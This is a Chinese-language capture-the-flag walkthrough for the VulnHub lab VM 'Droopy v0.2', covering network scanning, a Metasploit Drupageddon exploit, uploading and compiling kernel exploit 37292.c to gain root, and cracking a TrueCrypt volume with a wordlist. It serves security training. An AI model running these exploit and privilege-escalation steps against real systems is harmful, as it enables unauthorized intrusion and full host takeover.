概述:

目标:get flag

下载链接: https://www.vulnhub.com/entry/droopy-v02,143/

工具: kail linux

 

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

开工

1)扫描开道

# netdiscover -r 10.10.202.0/24

Hacking Box Droopy: v0.2 Safe 第1张

目标地址为:10.10.202.252

# nmap -sV 10.10.202.252

Hacking Box Droopy: v0.2 Safe 第2张

2)尝试利用 

访问80

 Hacking Box Droopy: v0.2 Safe 第3张

 

 

尝试创建一个账户,发现无法激活该账户

 使用nikto 对站点进行识别

3)再信息收集,漏洞探测

# nikto -h 10.10.202.252

Hacking Box Droopy: v0.2 Safe 第4张

Hacking Box Droopy: v0.2 Safe 第5张

Hacking Box Droopy: v0.2 Safe 第6张

4)漏洞利用

尝试搜索exp

msf > use exploit/multi/http/drupal_drupageddon 

Hacking Box Droopy: v0.2 Safe 第7张

msf exploit(multi/http/drupal_drupageddon) > set RHOST 10.10.202.252

Hacking Box Droopy: v0.2 Safe 第8张

查看当前用户的权限

Hacking Box Droopy: v0.2 Safe 第9张

5)提权root

# searchsploit kernel 3.13 

Hacking Box Droopy: v0.2 Safe 第10张

 

 

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root

上传exp

meterpreter > upload /root/37292.c /tmp/

[*] uploading  : /root/37292.c -> /tmp/

[*] uploaded   : /root/37292.c -> /tmp//37292.c

meterpreter >

meterpreter > shell

Process 1546 created.

Channel 3 created.

python -c 'import pty; pty.spawn("/bin/sh")'

$ pwd

pwd

/var/www/html

$ cd /tmp

cd /tmp

$ ls

ls

37292.c  vmware-root

$ chmod 755 37292.c

chmod 755 37292.c

$ gcc -o exp 37292.c

gcc -o exp 37292.c

$ chmod +x exp

chmod +x exp

$ ./exp        

./exp

spawning threads

mount #1

mount #2

child threads done

/etc/ld.so.preload created

creating shared library

# id

id

uid=0(root) gid=0(root) groups=0(root),33(www-data)

Hacking Box Droopy: v0.2 Safe 第11张

Hacking Box Droopy: v0.2 Safe 第12张

 

 Hacking Box Droopy: v0.2 Safe 第13张

 

 Hacking Box Droopy: v0.2 Safe 第14张

6)获取flat文件内容

接下来对此文件进行破解

# ls -lh /usr/share/wordlists/rockyou.txt.gz

# gunzip rockyou.txt.gz

# cat rockyou.txt | grep academy > /root/dict.txt

# truecrack -t dave.tc -k sha512 -w dict.txt -v

Hacking Box Droopy: v0.2 Safe 第15张

Hacking Box Droopy: v0.2 Safe 第16张

 

 Hacking Box Droopy: v0.2 Safe 第17张

 

Hacking Box Droopy: v0.2 Safe 第18张

 参考:

https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/

https://aisherwood.gitbooks.io/reference-book/content/droopyos.html

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄